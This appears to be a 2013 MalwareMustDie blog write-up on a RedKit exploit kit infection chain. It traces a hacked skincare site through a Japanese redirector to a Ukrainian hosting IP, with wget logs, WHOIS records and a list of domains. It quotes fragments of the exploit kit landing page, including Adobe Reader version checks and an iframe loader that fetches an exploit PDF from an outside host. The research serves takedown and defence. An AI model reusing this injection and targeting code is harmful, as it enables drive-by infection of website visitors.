The difference between my previous analysis and this one is, this was purely analyzed & wrote from a "weaponized" OS X with my bunch of FreeBSD tools recompiled on it.
I hope this writing can be used as a how-to to my friends who used OSX same environment too. So for Mac users, specially for you who are familiar with UNIX/Linux command lines, don't be hurry to switch into other "X" OS for analysis, in my test-drive in writing this post, it proofed that OS X is more than enough to do a deep analysis of any threat.
OK, here we go!
It all begins with the infected site as per below url:
During the access to the site I recorded the below connection with the X11's based Wireshark:
If we follow the package within one http response well, it will show the request for infection below:
We saw 4 or 5 redirection in a row in accessing the infector site above. So I grabbed the "anti-aging-c-35.html?p___= to see the redirected IFRAME code was there, as per below snipped of TextMate:
Why a single html can caused the 4 or 5 redirection? Must be more.. I searched the components included to view this site as per below search tools:
Then I opened my firefox, faking the request to fool the RedKit script and to get the other files used as components to this html, then found the same IFRAME method was injected as per searched in my F*bug:
In details, I went to those script contains the iframe to confirm as per below row of snapshots:
Seeing these I realized that this site is (STILL) completely being used to infect.
I further checked whether the infector site's domain is legit or not:
Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
Domain Name: TEVASKINCARE.COM
Created on: 01-Mar-10
Expires on: 25-Jul-13
Last Updated on: 26-Jul-12
Registrant:
Teva Skin Science LLC
117 Lost Forest Drive
Westminster, SC 29693
United States
Well.. it's ending up to a legit hacked site..in GoDaddy(s Network..
NetRange: 173.201.0.0 - 173.201.255.255 CIDR: 173.201.0.0/16 OriginAS: AS26496 NetName: GO-DADDY-COM-LLCTo my curiosity I studied the condition needed to grab this file by below HTTP header requests logged:
-2013-04-14 18:06:15-- h00p://www.tevaskincare.com/anti-aging-c-35.html?p___= Resolving www.tevaskincare.com... 173.201.140.74 Caching www.tevaskincare.com => 173.201.140.74 Connecting to www.tevaskincare.com|173.201.140.74|:80... connected. : GET /anti-aging-c-35.html?p___= HTTP/1.1 Referer: Whatever that has google in it.. User-Agent: MalwareMustDie was banging your site to check RedKit infector.. Host: www.tevaskincare.com HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sun, 14 Apr 2013 09:06:17 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Encoding: gzip Vary: Accept-Encoding Set-Cookie: osCsid=svle39em7ni3oj6982rjaossm2; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html : 200 OK Length: unspecified [text/html] Saving to: ‘anti-aging-c-35.html?p___=’ 2013-04-14 18:06:20 (495 KB/s) - ‘anti-aging-c-35.html?p___=’ saved [6403]I turned to see the redirectred infector, also checked it with browser to find request & response result as per below..
Not trusting so much on GUI result? Me too. So I reproduced the access:
--2013-04-14 18:11:03-- h00p://r-yonemura.jp/eagn.html?i=830988 Resolving r-yonemura.jp... 211.13.204.46 Caching r-yonemura.jp => 211.13.204.46 Connecting to r-yonemura.jp|211.13.204.46|:80... connected. : GET /eagn.html?i=830988 HTTP/1.1 Referer: h00p://www.tevaskincare.com/anti-aging-c-35.html?p___= User-Agent: Beware malware.. MalwareMustDie is getting closer.. with new toyz.. Host: r-yonemura.jp HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Sun, 14 Apr 2013 09:11:04 GMT Server: Apache X-Powered-By: PHP/5.2.14 Content-Length: 0 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html 200 OK Length: 0 [text/html] Saving to: ‘eagn.html?i=830988’ 2013-04-14 18:11:07 (0.00 B/s) - ‘eagn.html?i=830988’ saved [0/0]Yes the "switch" of the infector is turned "off" at the moment the log was taken.. to bad..
So always remember rule number one which is never doing too much "HTTP-banging" in dealing with RedKit infectors :-)
Anyhow, let's study the site used for second infector:
[Domain Name] R-YONEMURA.JP [Name Server] ns.namedserver.net [Name Server] ns2.namedserver.net [登録年月日] 2009/12/03 [有効期限] 2013/12/31 [状態] Active [最終更新] 2013/01/01 01:05:09 (JST) [名前] 株式会社リンクアップ [Name] link up inchmm, japanese legit domain, a SOHO legit business, in a hosting too,,
inetnum: 211.13.200.0 - 211.13.204.255 netname: ISLE-NET descr: Isle,inc. country: JP admin-c: MA117JP.. and good! Is under our jurisdiction to cleanup.
Fortunately, is the infector that I always keep an eye with, I always logged the "good response" as documentation which contained the Landing page that can be used as PoC as per pasted here -->>[HERE]
Now let's see the suspicious data in that landing page.. hope to see the interesting url for exploit infector or maybe a payload?
A Snip of Exploit Kit Landing Page
The plugin detect used...
var Ganni = {
version: "0.7.7",
rDate: "04/11/2012",
name: "Ganni",
handler: function (c, b, a) {
return function () {
c(b, a)
}
we have a heavily customized old version of PluginDetect :-)
As per it is, the OS detection..
c.OS = 100;
if (b) {
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1,
"iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2,
"Pocket\s*PC", 22.3, "", 100
];
for (f = d.length - 2; f >= 0; f = f - 2) {
if (d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break [...]
The condition for BSD OS are always empty anyway :-) Maybe next time I should test OpenBSD for accessing this?
Interesting flag of "status" to be pointed after after detecting java
if (c.isIE && !c.ActiveXEnabled && d !== "java") {
a.status = -2;
return a
}
a.status = 1; [...]
As per with Adobe reader, below is the initialization for infection with Pdf-Ctrl function..
Plugins: {
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
INSTALLED: {}, [...]
..with the handling after flag of version detected...
flopp = Ganni.getVersion("AdobeReader");
if (flopp) {
flopp = flopp.split(',');
sp1 = false;
if (flopp[1] < 4 && 9 == flopp[0]) sp1 = true;
if (flopp[1] < 3 && flopp[0] == 8) sp1 = true;
if (sp1) {
bosfef.setAttribute("width", 31);
bosfef.setAttribute("height", 13);
This is the part on how the HTML file got injected with IFRAME:
insertHTML: function (g, b, h, a, l) {
var m, n = document,
k = this,
q, p = n.createElement("span"),
o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)) {
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)) {
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2) {
if (/[^\s]/.test(b[o + 1])) {
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2) {
if (/[^\s]/.test(h[o + 1])) {
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
} else {
q = a
} [...]
And the variable used for infection is at the beginning of the script:
var bosfef = document.createElement("iframe");
function dettq() {
document.body.appendChild(bosfef);
bosfef.setAttribute(jsou, "h00p://marykay-duka.kharkov.ua/987.pdf");}
This is it, the usage the 897.pdf exploit to infect the malware.
File's currently unavailable (smile), or tango moved faster?
GET /987.pdf HTTP/1.1 Host: marykay-duka.kharkov.ua ( 91.206.200.199) HTTP request sent, awaiting response... : HTTP/1.1 404 Not Found Server: nginx/1.1.10 Date: Sun, 14 Apr 2013 13:12:13 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 205 Connection: keep-alive : 404 Not Found The requested URL /987.pdf was not found on this server ] done. 2013-04-14 22:12:15 ERROR 404: Not Found.I used both previous infector url referers to re-check and the results were the same. Well, at least we're sure now that there is no harmless site will have the script works as per described, it is good enough for the clean up purpose. So let'S invetigate further on the network & infection records.
What's with 91.206.200.199 ?
This is the main course of this story actually. As we can see the marykay-duka.kharkov.ua is a domain served in the Ukrainian Hosting service. The IP officially own by this host w/reversed IP registered by:
"web17.ukraine.com.ua A 91.206.200.199"Which is a confirmed Hosting Service's IP address:
"inetnum: 91.206.200.0 - 91.206.201.255 netname: Hosting descr: Delta-X LTD" org: ORG-LA230-RIPE country: UA admin-c: RIV3-RIPE tech-c: RIV3-RIPE status: ASSIGNED PI mnt-by: RIPE-NCC-END-MNT mnt-by: DELTAXUA-MNT organisation: ORG-LA230-RIPE org-name: "DELTA-X" LTD org-type: OTHER "address: Ukriane, Kyiv address: Bogdana Khmelnitskogo 16/22, r. 504/1 abuse-mailbox: abuse@delta-x.ua" admin-c: RIV3-RIPE person: Rudenko Ilya Vladimirovich address: UA, Kyiv, 03065 address: PO Box 65 phone: +38(044)392-74-33 abuse-mailbox: abuse@delta-x.uaThe thing is there are so many web infection ended up in this address:
"Some PoC of infections in this Hosting server's IP.. urlquery ALSO detected other action in some of the domains under this IP..." url: http://urlquery.net/search.php?q=91.206.200.199&type=string&start=2013-01-14&end=2013-04-14&max=50 Date (CET) Alerts / IDS URL IP 2013-04-14 15:40:35 0 / 0 "h00p://marykay-duka.kharkov.ua" 91.206.200.199 2013-04-04 16:38:05 0 / 8 "h00p://www.2sen.ru/engine/download.php?id=55" 91.206.200.199 2013-04-04 15:59:02 0 / 8 "h00p://www.2sen.ru/engine/download.php?id=55" 91.206.200.199 "And so does Virus Total.." url: https://www.virustotal.com/en/ip-address/91.206.200.199/information/ 2/36 2013-04-11 11:23:26 "h00p://chevrole.org.ua/"One of the above infected url has a payload snapshot:
Thus, pDNS command line combined with domains checker script we posted in our Google Project can extract more domains used by malware infector & current ALIVE status:
"..while these are domains with via UKRAINE.COM.UA registrar -
with NS, a PoC of hosting (provided set of domains + DNS)"
490968298.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
overfuns.com,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pro100soft.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA
ukrjudo.com,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA
zverdvd.org,91.206.200.43,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pamparam.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
pr-plus.net,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
metal-forming.org,91.206.200.199,NS1.UKRAINE.COM.UA,NS2.UKRAINE.COM.UA,NS3.UKRAINE.COM.UA
[...] etc [...]
"AND these domains are pointed to an IP address w/o proper NS sets.."
chevrole.org.ua,91.206.200.199,
forum.zverdvd.org,91.206.200.43,91.206.200.199,
funmobile.com.ua,91.206.200.199,
marykay-duka.kharkov.ua,91.206.200.199,
2sen.ru,91.206.200.199,91.206.200.199,
papercraft.su,91.206.200.210,
reshebniki.org.ua,91.206.200.43,91.206.200.199,
Well, this is a hosting server.. so it has many domains.. Sure it is.
I didn't say that the 44 domains which are registered in this IP are verdicted bad, but some dangerous infector with the RedKit and etc Exploit Kit infector are found ending up to this IP.
( This is the list of active domains in 91.206.200.199 -->>[PASTEBIN] )
Furthermore the domain used for infection in our case is belong to below info:
domain: marykay-duka.kharkov.ua descr: Domain registered for customer of Ukraine.com.ua admin-c: DELTA-EUNIC tech-c: DELTA-EUNIC nserver: ns1.ukraine.com.ua nserver: ns2.ukraine.com.ua nserver: ns3.ukraine.com.ua mnt-by: DELTA-MNT-EUNIC reg-by: DELTA-REG-EUNIC changed: hostmaster@deltahosting.com.ua 20130308 source: EUNIC Transfer: locked Record created: 2011-03-11 Record last updated: 2013-03-08 Record registered: 2011-03-11 Record expires: 2014-03-11 Status: OKIf my deduction is correct, whether this hosting is also under hacking to be used for infection OR ...(Our Tango Team is investigating further now).
The bottom line is, in the mean time please keep an eye on a suspicious access which lead to 91.206.200.199. And all of the network analysis was conducted via OSX Terminal :-)
References
The below numbers are link to the infection references that can be used for our infector dismantling (TangoDown) purpose:
#MalwareMustDie
